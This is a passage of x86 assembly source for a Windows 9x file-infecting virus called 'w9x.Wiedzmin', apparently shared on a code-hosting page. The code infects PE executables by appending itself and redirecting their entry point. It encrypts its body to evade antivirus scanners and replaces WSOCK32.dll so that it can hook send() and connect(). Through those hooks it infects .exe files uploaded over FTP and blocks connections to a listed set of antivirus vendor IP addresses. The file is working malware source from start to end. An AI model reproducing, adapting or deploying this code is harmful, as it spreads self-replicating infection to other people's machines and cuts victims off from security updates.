cmp byte ptr [edx+4],00h
je @crypted
@go_:
xor byte ptr [edx],al
inc edx
loop @loop_it
jmp @e_out
@crypted:
pop esi
mov eax,dword ptr [ebp+e_bytes]
sub eax,ecx
mov dword ptr [ebp+e_bytes],eax
jmp @e_out
@e_error:
@e_out:
pop eax
cmp dword ptr [ebp+help_virus],1
je @mute_other_virus
popad
ret
;ENTRY: EDI - BUFFER
@combine_key:
mov eax,dword ptr [ebp+key2]
stosd
add eax,dword ptr [ebp+key]
lea edi,[ebp+key_main]
stosd
ret
;**************************************************************************
;UNCRYPT *|*
;**************************************************************************
@uncrypt:
call delta_e
delta_e: pop ebp
sub ebp,offset delta_e
pushad
mov edx,dword ptr [ebp+imagebase]
add edx,dword ptr [ebp+hosteip]
mov ecx,dword ptr [ebp+e_bytes]
xor ebx,ebx
mov eax,[ebp+key_next]
@lloop_it:
xor byte ptr [edx],al
inc edx
loop @lloop_it
f_e:
cmp dword ptr [ebp+czy_je],0
jne @helper_endd
popad
ret
@helper_endd:
popad
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
czy_je dd 0
e_bytes dd 0
e_where dd 0
e_god dd 0
hosteip dd 0
imagebase dd 0
key_next dd 0
@helper_end: nop
;***********************************************************
@mute_other_virus:
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = n§ of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
mov eax,dword ptr [ebp+fSize]
add eax,helper
mov ecx,[edi+3Ch]
call Align_
mov [esi+10h],eax
mov [esi+08h],eax
pop edx
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edi+50h],eax
lea esi,[ebp+@uncrypt] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,helper
mov dword ptr [ebp+czy_je],1
rep movsb
push dword ptr [ebp+offset fMapReal]
call dword ptr [ebp+_UnmapViewOfFile]
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
mov ecx,dword ptr [ebp+fSize]
add ecx,helper
call @zostaf
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_CloseHandle]
popad
ret
;************************************************************************************************
;Wsock32 hooker!!!
;************************************************************************************************
@wsockz:
mov eax,dword ptr [ebp+_GetSystemDirectoryA]
mov ebx,dword ptr [ebp+_GPA]
push 260
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_GetSystemDirectoryA]
lea eax,[ebp+offset winDIRr]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
lea edi,[ebp+sysDIR]
lea esi,[ebp+wsock]
call strcat
lea edi,[ebp+winDIRr]
lea esi,[ebp+nowe]
call strcat
push 1
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_CopyFileA]
cmp eax,0
je bye
lea edi,[ebp+finddata.cFileName]
lea esi,[ebp+winDIRr]
call strcat
mov dword ptr [ebp+go_wsock],1
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
cmp edx,-1
je bye
mov dword ptr [ebp+capis],0
mov eax,dword ptr [ebp+fMapReal]
mov dword ptr [ebp+wsock_h],eax
call @go_export
call _God
mov dword ptr [ebp+go_wsock],0
lea eax,[ebp+WININIT]
push eax
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
lea eax,[ebp+rename]
push eax
call dword ptr [ebp+_WritePrivateProfileStringA]
bye: ret
;************************************************************************************************
;STRCAT !!! Its smaller and faster (i think - but non optimized with repz)
;ENTRY:
;edi - base buffer
;esi - string to cut
;************************************************************************************************
strcat:
push esi
mov esi,edi
sstrcat: lodsb
cmp al,0
jne sstrcat
dec esi
mov edi,esi
pop esi
cat_it:
lodsb
cmp al,0
je le
stosb
jmp cat_it
le:ret
;************************************************************************************************
;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
;************************************************************************************************
@bad_name:
xor edi,edi
lea esi,[ebp+finddata.cFileName]
_letra:
lodsb
cmp al,'a'
je error_a
cmp al,'A'
je error_a
cmp al,'E'
je error_a
cmp al,'e'
je error_a
cmp al,'v'
je error_a
cmp al,'V'
je error_a
ret
error_a: inc edi
ret
;================================================================================================
;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ
;================================================================================================
@GGEN_KEY:
cmp dword ptr [ebp+firstk],1
jne @go__
mov ebx,40h
mov dword ptr [ebp+key2],0h
jmp GEN_KEY
@go__:
mov dword ptr [ebp+offset key],0000000h
mov ebx,55h
GEN_KEY:
call dword ptr [ebp+_GetTickCount]
idiv ebx ;w EDX reszta ;) duzo prostszy algorymt zwracania losowych
cmp edx,ebx ;liczb niz ten T2000-Immortal Riota
jae GEN_KEY
inc edx ;MUSIMY COS SKODOWAC CHOCIAZ O +1
cmp dword ptr [ebp+firstk],1
je @go___
mov dword ptr [ebp+offset key],edx
@go___: mov dword ptr [ebp+offset key2],edx
ret
@CRYPT_BYTEZ:
mov ecx,edx
Try_crypt:
lodsb ;czytamy bajta qrwa :P jest w AL
cmp al,0
je _zero
cmp al,07h
je _retprog
_next: add al,cl
stosb
jmp Try_crypt
_zero: inc edi
jmp Try_crypt
_retprog: ret
@UN_CRYPT_BYTEZ:
mov ecx,dword ptr [ebp+offset key]
Try_uncrypt:
lodsb
cmp al,0h
je _zero0
cmp al,07h
je ret0
_next0: sub al,cl
stosb
jmp Try_uncrypt
_zero0: inc edi
jmp Try_uncrypt
ret0: ret
;================================================================================================
;HOOKER DATA
;================================================================================================
start_h:
hooked_connect:
call get_delta
pushad
mov edx,[esp+(10*4)] ; EDX = sockaddr
mov ecx,[edx+(2*2)] ; ip
shl ecx,8 ; last octet
lea esi,[eax+DENIED]
mov edi,eax ;save EAX in EDI
scan_denied: lodsd
dec esi
shl eax,8
jz TOC
cmp ecx,eax
jne scan_denied
push WSAHOST_NOT_FOUND
call dword ptr [edi+_WSASetLastError]
popad
push -1
pop eax
jmp out_c
TOC: ;tHe oRgInal coNneCt ;]
popad
push [esp+0Ch] ;int namelen
push [esp+4+8] ;const struct sockaddr FAR* name
push [esp+8+4] ;SOCKET s
call dword ptr [eax+a_connect] ;call orginal connect!!!
out_c: retn 0Ch
;//////////////////////////////////////////////hooked send///////////////////////////////////////
hooked_send:
call get_delta
pushad
mov edi,eax
mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf)
mov eax,[ebx]
cmp eax,'ROTS' ;FTP: Storing a file ? ;)
je _ftp_store
TOS:
popad ;tHe oRgInaL sEnd
push [esp+10h] ;int flags
push [esp+4+0Ch] ;int len
push [esp+8+8] ;const char FAR * buf
push [esp+0Ch+4] ;SOCKET s
call dword ptr [eax+a_send] ;call orginal send!!!
out_s: retn 10h
_ftp_store: ;yeah! infect on tha fly
mov edx,[esp+28h] ;point to name =]
add edx,5 ;skip STOR and one space (5 bytes)
mov esi,[esp+28h]
@loop:
lodsb
cmp al,'.' ;find first dod
jne @loop
dec esi
mov esi,[esi] ;a exe file!?
cmp esi,'EXE.'
je try_it
cmp esi,'exe.'
je try_it
jmp TOS
try_it:
mov ecx,edi
lea edi,[ecx+offset buff]
mov esi,edx
xor edx,edx
_l:
lodsb
cmp al,0dh
je _end
stosb
inc edx
jmp _l
mov edi,edx
_end:
lea edx,[ecx+offset buff]
lea ebx,[ecx+offset inf_prog]
push ecx ;preserve ecx
push ebx
push 260
call dword ptr [ecx+gcd] ;tricky ;] GetCurrentDirectory
;ftp clients use that to locate
;file.
pop ecx ;load ecx
mov eax,edi
xor ebx,ebx
lea esi,[ecx+offset inf_prog]
_loop_1:
lodsb
inc ebx
cmp al,0
jne _loop_1
_do:
lea edi,[ecx+offset inf_prog] ;add \ to patch ;]
add edi,ebx
dec edi
mov al,'\'
stosb
lea esi,[ecx+offset buff]
_l2: ;well optimised strcat
lodsb
cmp al,0
je _skipp
stosb
jmp _l2
_skipp:
lea esi,[ecx+offset santa]
lea edi,[ecx+offset inf_prog2]
_cat:
lodsb
cmp al,0
je _catt
stosb
jmp _cat
_catt:
mov al,' '
stosb
lea esi,[ecx+offset inf_prog]
_make_real:
lodsb
cmp al,0
je done
stosb
jmp _make_real
done:
mov edi,ecx
push 1
lea eax,[edi+offset inf_prog2]
push eax
call dword ptr [edi+wex]
jmp TOS
reset_err: push WSAECONNRESET
call dword ptr [edi+_WSASetLastError]
popad
push -1
pop eax
jmp out_s
;/*END-------------------------------------------------------------------------------------------
get_delta:
call @hookerdelta
@hookerdelta:
pop eax
sub eax,offset @hookerdelta
ret
my_data:
a_send dd 0
a_connect dd 0
msgg dd 0BFF44146h
DO_WPISU: _WSASetLastError dd 0
wex dd 0
gcd dd 0
WSAHOST_NOT_FOUND equ 11001
WSAECONNRESET equ 10054
buff db 110 dup (0)
inf_prog2 db 260 dup (0)
inf_prog db 260 dup (0)
santa db 'C:\Program Files\deithwen.exe',0
;santa db 'C:\WINDOWS\CALC.EXE',0
;***********DENIED LIST*************************************************************************
;thx goez to T-2000/Immortal Riot ;]
DENIED: DB 161,069,003 ; nai.com
DB 216,122,008 ; avp.com
DB 195,170,248 ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
DB 193,247,150 ; avp.ch, metro.ch
DB 194,252,006 ; datafellows.com, f-secure.com
DB 195,112,025 ; drsolomon.com
DB 208,228,231 ; mcafee.com
DB 194,203,134 ; sophos.com
DB 146,145,148 ; norman.com
DB 206,204,003 ; pandasoftware.com
DB 193,004,210 ; complex.is
DB 203,037,250 ; leprechaun.com.au
DB 141,202,248 ; cai.com
DB 216,033,022 ; antivirus.com, trendmicro.com
DB 216,035,137 ; sarc.com
DB 216,086,104 ; virus.com
DB 212,029,228 ; invircible.com
DB 208,226,167 ; symantec.com
DB 207,227,040 ; grisoft.com
DB 194,105,193 ; drweb.ru
DB 000,000,000 ; end of table.
hook_end label byte
;________________________________________________________________________________________________
;============================================================================================DATA
;________________________________________________________________________________________________
;**APIZ TO HOOK**
A1 db 'send',0
A1s equ $-A1
A2 db 'connect',0
A2s equ $-A2
e_esi dd 0
APIS db 'GetProcAddress',0
APIS_SIZE = $ - APIS
APIList: db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "SetFileAttributesA",0
db "SetFileTime",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "GetFileTime",0
db "GetFileSize",0
db "GetFileAttributesA",0
db "SetFileAttributesA",0
db "ReadFile",0
db "WriteFile",0
db "SetFilePointer",0
db "SetEndOfFile",0
db "CloseHandle",0
db "SetCurrentDirectoryA",0
db "GetWindowsDirectoryA",0
db "GetSystemDirectoryA",0
db "CopyFileA",0
db "ExitProcess",0
db "GetTickCount",0
db "GetCommandLineA",0
db "IsDebuggerPresent",0
db "OutputDebugStringA",0
db "WinExec",0
db "LoadLibraryA",0
db "GetModuleHandleA",0
db "Sleep",0
db "GetSystemTime",0
db "WritePrivateProfileStringA",0
db "VirtualAlloc",0
db "VirtualFree",0
db "GetCurrentDirectoryA",0,07h ;07h stops the looking up
msg dd 0BFF44146h
key dd 0
;shit7 db "w.dll",0
marker db 'sru.exe',0
;marker db '*.exe',0
TO_CRYPT_DATA: to_ja: db 0ah,0dh
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db "Æ Deithwen Addan Flared Again",0ah,0dh
db "Æ You have eyez, but u can't see",0ah,0dh
db "Æ You have earz, but u can't hear",0ah,0dh
db "Æ Wake up from unreal world before",0ah,0dh
db "Æ you drown in the Sea of Chaos.",0ah,0dh
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db 0ah,0dh,0
wsock db "\WSOCK32.dll",0
nowe db "\WZZOCK32.dll",0
sice9x db "\\.\SICE",0
sle db "WSASetLastError",0
user32 db "USER32.DLL",0
gdi32 db "GDI32.DLL",0
WININIT db "WININIT.INI",0
rename db "rename",0
jed db "X",0
famil db "Verdana",0
logo db ": w9x.WiEDZMiN has you :",0
deshit db "kfe",0,07h
@crypt_my_body:
push ecx
call dword ptr [ebp+_GetTickCount]
mov ebx,255
idiv ebx
mov ecx,edx
@mutualisk:
mov byte ptr [edi],90h
inc edi
loop @mutualisk
pop ecx
pushad
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE
@loop_decryptt:
xor byte ptr [edx],al
inc edx
loop @loop_decryptt
@end_de:
popad
rep movsb
mov edi,'!PUY'
call @main_decryptor
ret
key_main dd 0
;db 5 dup (90h)
; align dword
VirusEnd label byte
;==================================================FIND=========================================
;=============================================VirtualData nie idzie do wira=====================
HeapStart label byte
finddata WIN32_FIND_DATA <> ;wskaznik do struktury
fileHandle dd 0
fileAtrib dd 0
licznik_b dd 0
APIListA: _FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_SetAttributesA dd 0
_SetFileTime dd 0
_CreateFileA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_GetFileTime dd 0
_GetFileSize dd 0
_GetFileAttributesA dd 0
_SetFileAttributesA dd 0
_ReadFile dd 0
_WriteFile dd 0
_SetFilePointer dd 0
_SetEndOfFile dd 0
_CloseHandle dd 0
_SetCurrentDirectoryA dd 0
_GetWindowsDirectoryA dd 0
_GetSystemDirectoryA dd 0
_CopyFileA dd 0
_ExitProcess dd 0
_GetTickCount dd 0
_GetCommandLineA dd 0
_IsDebuggerPresent dd 0
_OutputDebugStringA dd 0
_WinExec dd 0
_LoadLibraryA dd 0
_GetModuleHandleA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_WritePrivateProfileStringA dd 0
_VirtualAlloc dd 0
_VirtualFree dd 0
_GetCurrentDirectoryA dd 0
@GDI_APIZA: _CreateFontA dd 0
_TextOutA dd 0
_SetBkMode dd 0
_SetTextColor dd 0
_SelectObject dd 0
_GetSystemMetrics dd 0
_GetDesktopWindow dd 0
_GetWindowDC dd 0
_ReleaseDC dd 0
SYSTEM_TIME: wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0
F1: dd 2 dup (?)
F2: dd 2 dup (?)
F3: dd 2 dup (?)
vbuf dd 0
help_virus dd 0
memory dd 0
header dd 0
align dd 0
_hostIP dd 0
_secAlign dd 0
newEIP dd 0
NewEIP dd 0
firstk dd 0
key2 dd 0
go_wsock dd 0
wsock_h dd 0
moj_address dd 0
capis dd 0
wsock_hh dd 0
NON dd 0 ;numbers of names
AOF dd 0 ;addr of Functions
AON dd 0 ;addr of Names
AOO dd 0 ;addr of Ordinals
IndexA dd 0
_GPA dd 0
fHnd dd 0
fHndMap dd 0
fMapReal dd 0
fSize dd 0
my_seh dd 0
was_win dd 0
ic dd 0
sHnd dd 0
shitsize dd 0
oldDIR db 512 dup (?)
winDIR db 260 dup (?)
sysDIR db 260 dup (?)
winDIRr db 260 dup (?)
db 5 dup (?)
toHOST dd 0
; align dword
HeapEnd label byte
titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
bodyy db "Elaine blath, Feainnewedd",0ah,0dh
db "Dearme aen a'caelme tedd",0ah,0dh
db "Eigean evelienn deireadh",0ah,0dh
db "Que'n esse, va en esseath",0ah,0dh
db "Feainnewedd, elaine blath!"
db 0ah,0dh
virussizee
db " bytes",0
fakehost:
push 0h
push offset titlee
push offset bodyy
push 0h
call MessageBoxA
push 0h
call ExitProcess
endshit: ends
End v_start
View Git Blame Copy Permalink